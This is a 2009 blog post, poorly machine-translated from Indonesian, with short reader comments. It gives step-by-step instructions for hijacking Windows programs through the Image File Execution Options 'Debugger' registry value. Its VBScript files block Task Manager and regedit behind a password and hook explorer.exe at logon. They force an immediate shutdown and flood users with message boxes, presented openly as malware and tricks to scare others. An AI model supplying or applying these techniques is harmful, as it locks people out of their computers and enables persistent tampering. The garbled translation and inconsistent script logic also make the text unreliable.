Wednesday, December 30, 2009

manipulation of an application window

a tip and trick that is rarely used by the skill or master computer. a tip and trick manipulation this application is not paid manipulation application or free, but sort manipulation this application is running with a ms.word program command winword.exe, excel, or you run IE (internet explorer) but the road is a bad tip and very unique.

the most to the tip and the tip of this trick can be used on the window, even tip no longer is any additional applications. capital is only 99% window (30% and 70% registry script) and 1% using scripting intelligence.

manipulation tip is very well suited to some of those activities as follows:
1. admin who did not want the kind client - kind of.
2. they use the computer together (cafes, computer courses) but did not want certain programs run.
3. personal computers but is very afraid of the brain - manipulate other people or younger.
4. want be different with friends.
5. like ignorant friends or often idle
6. often try to - try

you should know that we will play with the script and the registry. which means quite dangerous if you do not follow the steps - steps from me. and you watch carefully and step by step. If you still do not understand or do not understand you should not directly apply tips and tricks below will result in enough trouble. but when it clearly and understand the tips and please continue with the next trick.

some word
every time you run the program, then the window will check or control of registry keys.

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\

the subkey of the file name and not paths. subkey will be equated with the name that will run progrma. if the same, it will check the string "Debugger". and if the string is the window will run the program in accordance with the contents of the string. try you see below:

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ taskmgr.exe

empty contents you see this image above. so if you run taskmgr.exe from the RUN menu in any EXE location. the program will run no matter the parth or another. but taskmgr.exe subkey contains the string "Debugger" see the picture below.

and the string value "C: \\ Program Files \\ Microsoft Office \\ Office11 \\ WinWord.exe". then each run RUN tasmgr.exe from the menu or from the other tasks that appear not manager instead ms.word.

an application:
with a very simple way as above is enough time to run a malicious intent. yagn as I explained the above, the window will check the existence of the string "debugger" and read the contents to run programs on purpose. but what would happen if the contents of the string "Debugger" in the blank? if nothing happened - what was the try despite a thousand times is not going the way malicious applications. but you do not worry about this tip and trick will not stop here it is still a long way to make our malware and good step if you know about the VBS script.

how to scare computer users:
for example there are users who want ignorant run task manager with CTRL + ALT + DEL, you try to fill the string "Debugger" with "wscript c: \\ skrip.vbs" without the quotes yes.
then you run a note and type the code below:
code: MsgBox ( "How dare you ignorant my computer! it was recorded! who have a computer then going mad !!!")

or the actual format below:
MsgBox ( "message")

then save the file in "C: \\" with the name "skrip.vbs" (unless you set yourself)
now try run task manager.

Make a password to run things
If you want to install the password for the program (eg) task manager, the "Debugger" content with\u003e\u003e "wscript.exe c: \\ skrip.vbs" (without the quotation marks, too)

then type the following script in notepad.

Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
If s = "PASSWORD" Then
  set wscr=CreateObject("WScript.Shell")
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger","wscript C:\skrip.vbs","REG_SZ"
  Msgbox("Awas kalo coba-coba maen-maen dengan komputer ini!!!")
End IF

then save with the name "skrip.vbs" in C: \\

and IF you want to make a regedit password, live for a new key with the name "regedit" (do not say forget the place. go try to check the above)
then make a string "debugger" and fill with "wscript c: \\ skrip.vbs" (still without the quotes)
contents same as above ... but replace the "wscr.exec (taskmgr.exe)" replaced "wscr.exec (regedit.exe)"
so if password other files ...

if you want to change the password ... clay third row ... PASSWORD said that you replace like-like you is ...
WARNING! Case sensitive password!

Super Security
This time the game was still in VBScript ... a security that can barely broken ... Login PASSWORD SUPER-BAD!

Each run windows, then the application is first run and was followed NTOSKRNL winlogon and result in EXPLORER.
your evil thoughts would lead to "change the debugger to winlogon.exe" ... It's too bad ... now I give a little better: Explorer.
Essentially every time you enter a password window will be prompted by this little program. and if the wrong password, windows will Shutdown!
quite bad right.

Step by Step Procedure

1. Notepad
type the following script

Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
set wscr=CreateObject("WScript.Shell")
If s = "PASSWORD" Then
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger","wscript C:\muncul.vbs","REG_SZ"
  Msgbox("Berani ya!!! awas kamu!!!")
  wscr.exec("shutdown -s -f -t 00")
End IF

save with the name "C: \\ muncul.vbs"

2. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe

3. string debugger
in the key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe
for the string "debugger" and fill with "wscript c: \\ muncul.vbs"

4. done
please try restarting your computer and feel Khasiatnya ^ ^

Change the way the program
still remember most of the writing? jalanin the way MS Word MS Excel instead it loh ...
This time I beberin how ...

1. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ winword.exe

2. string
in key winword.exe, make the string "debugger" and then fill with
"c: \\ Program Files \\ Microsoft Office \\ OFFICE11 \\ EXCEL.EXE" with quotation marks (because there are spaces. if no yes no spaces need quotes)

3. done
run the word ... which appears even excel
most evil tricks. Change the program that works with the script!
returned to the VBS mode ...
follow the step above (the word so excel). but debugger replaced so "wscript (jahil.vbs)" (without the quotes )
This script contents jahil.vbs

set wscr=CreateObject("WScript.Shell")
Msgbox("A Ghost has attacked this computer. This computer may result an invalid execution. Contact your Ghostbusters for more information.")
dim i
for i=0 to 100
   msgbox "Ayo bermain tekan enter 100x! Anda harus menekannya " & 100 - i & "x lagi"
msgbox "Gooooooooooooooooooood Byeeeeeeeeeeeeeeee!!!!!"
wscr.exec("c:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE")

 save with the name "C: \\ jahil.vbs" then run the word ... enjoy tapping


  1. Padahal bagus tuh trik'a,, But i'm not englih language!!!
    tolong terjemahin dong!! hhee
    visit me

  2. sorry sob mungkin habis ne mau tak kasih tool translate bos... tunggu ya bos...

    maaf ya sob...
    jangan .... sampai ketinggalan sob

  3. sma2 semoga bermanfaat saja dah
